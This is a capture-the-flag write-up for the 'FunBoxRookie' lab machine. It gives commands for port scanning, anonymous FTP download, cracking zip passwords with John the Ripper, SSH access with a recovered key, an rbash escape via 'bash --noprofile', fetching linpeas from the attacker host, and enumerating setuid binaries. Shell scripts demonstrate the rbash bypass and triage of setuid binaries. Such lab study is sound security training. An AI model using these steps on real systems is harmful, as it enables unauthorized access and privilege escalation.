FunBoxRookie
IP : 192.168.84.107
nmap 192.168.84.107 -p- -sV -A
FTP is allowing anonymous login. Downloaded all zip files.
Port 80 seems to be a dead end.
Found that each zip file was password protected.
Ran zip2john *.zip > zipfile.hash to get a crackable hash for each zip file.
Ran John the Ripper against zipfile.hash
john zipfile.hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Unable to connect via SSH with Cathrine's account.
Connected via SSH with Tom
ssh tom@192.168.84.107 -i id_rsa_tom
Found the local.txt flag in Tom's home folder.
rbash is restricting commands.
Got stuck at priv esc. Must get better at priv esc. Had to get a hint to read .mysql_history.
Files in Tom's home directory
Submitted hash in local.txt
Read all files starting with .
cat .*
Found that there is a SQL entry with Tom's credentials in .mysql_history.
Found that su is setuid (the original notes called it "stickied"). With Tom's credentials recovered from .mysql_history:
sudo su
Also logged back in via SSH to the restricted shell to test privilege escalation through the SUID at binary.
Found a restricted shell bypass. rbash only refuses command names containing a slash and makes PATH read-only, so a bare "bash" still resolves through PATH to an unrestricted shell, and --noprofile skips any startup file that would reapply the restrictions:
ssh tom@192.168.84.107 -i id_rsa_tom -t "bash --noprofile"
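To see exactly what the bypass relies on, the following added example (my code, not part of the original writeup) runs a few probe commands under a restricted bash (`bash -r`, the same mode a /bin/rbash login shell gets) and reports which ones are blocked. It assumes bash is installed and on PATH; the probe commands are constructed for illustration.

```shell
# Added example: probe what restricted bash blocks, and show that a plain
# "bash --noprofile ..." child (no slash in the command name) escapes it.
# Assumes bash is installed and reachable through PATH.

# rbash_try CMD : run CMD under restricted bash, print "allowed" or "blocked"
rbash_try() {
    if bash -r -c "$1" >/dev/null 2>&1; then
        printf 'allowed\n'
    else
        printf 'blocked\n'
    fi
}

# rbash_probe : run the usual probes and print one result line per probe
#   true                          -> allowed (baseline, nothing restricted)
#   cd /tmp                       -> blocked (cd is disabled in rbash)
#   /bin/true                     -> blocked (slash in the command name)
#   PATH=/tmp                     -> blocked (PATH is read-only in rbash)
#   bash --noprofile -c "cd /tmp" -> allowed (bare "bash" is found via PATH;
#                                    the child is not restricted)
rbash_probe() {
    for cmd in 'true' 'cd /tmp' '/bin/true' 'PATH=/tmp' \
               'bash --noprofile -c "cd /tmp"'; do
        printf '%-32s %s\n' "$cmd" "$(rbash_try "$cmd")"
    done
}
```

Run `rbash_probe` to see the table; the last row is the same trick the ssh -t command above uses, since sshd hands the remote command to the login shell as `rbash -c "bash --noprofile"`.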
Started a Python HTTP server on the attacking machine and grabbed linpeas:
curl http://192.168.49.84:8000/linpeas.sh -o linpeas.sh
Made linpeas.sh executable (chmod +x is enough; 777 also leaves it world-writable):
chmod 777 linpeas.sh
LinPEAS found the same SUID binaries already spotted, but ran the find manually for good measure (-perm -4000 is the portable equivalent of -perm -u=s; add -user root to keep only setuid-root files):
find / -perm -u=s -type f 2>/dev/null
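The find above lists every setuid file; the next step is usually to check which of those names have a known escape. The following added example (my code, not from the original writeup or from LinPEAS) wraps the find and flags basenames that appear in a short, hand-picked list; the list is an assumption for illustration and is not a complete copy of GTFOBins. It also builds a constructed fake root in a temp directory so the script can be exercised offline.

```shell
# Added example: enumerate setuid files under a root and flag the ones
# whose basename is on a short triage list. The list is illustrative
# (assumed), not authoritative. In the field, add "-user root" to the find.

INTERESTING="at bash find vim python python3 nmap env cp mv"

# find_suid ROOT : print setuid files under ROOT, one path per line
find_suid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# triage_suid ROOT : print "INTERESTING <path>" for names on the list,
# "setuid <path>" for everything else
triage_suid() {
    find_suid "$1" | while IFS= read -r f; do
        name=$(basename "$f")
        hit=0
        for i in $INTERESTING; do
            [ "$i" = "$name" ] && hit=1
        done
        if [ "$hit" -eq 1 ]; then
            printf 'INTERESTING %s\n' "$f"
        else
            printf 'setuid %s\n' "$f"
        fi
    done
}

# make_fixture : build a constructed fake root (files owned by the caller,
# so this only demonstrates the mode-bit check); prints the directory path
make_fixture() {
    d=$(mktemp -d)
    mkdir -p "$d/usr/bin" "$d/bin"
    : > "$d/usr/bin/at";     chmod 4755 "$d/usr/bin/at"      # setuid, on the list
    : > "$d/usr/bin/passwd"; chmod 4755 "$d/usr/bin/passwd"  # setuid, not listed
    : > "$d/bin/ls";         chmod 0755 "$d/bin/ls"          # not setuid
    printf '%s\n' "$d"
}
```

On a real target run `triage_suid /`; the fixture exists only so the two functions can be checked without root-owned binaries.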